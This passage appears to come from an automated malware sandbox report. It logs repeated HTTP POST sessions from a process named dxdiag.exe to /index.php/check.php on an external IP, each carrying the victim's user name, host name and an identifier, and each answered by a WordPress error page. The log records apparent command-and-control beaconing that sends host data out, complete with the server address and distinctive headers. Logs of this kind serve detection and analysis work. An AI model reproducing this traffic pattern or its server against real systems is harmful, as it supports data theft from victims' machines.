                        Oct 1, 2024 07:48:00.870994091 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:00.871006966 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.549737137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:01.029520035 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:01.034427881 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:03.631191015 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:01 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:03.631252050 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:03.631305933 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.549738137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:03.777067900 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:03.781970978 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:06.419934034 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:06.419956923 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:06.419970989 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.549739137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:06.576972961 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:06.581937075 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:09.193640947 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:07 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:09.193661928 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:09.193677902 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.549740137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:09.403965950 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:09.408894062 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:12.018668890 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:09 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:12.018691063 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:12.018702030 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.549741137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:12.168895006 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:12.173913002 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:14.774228096 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:14.774250031 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:14.774265051 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.549742137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:14.934040070 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:14.938920975 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:17.521382093 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:15 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
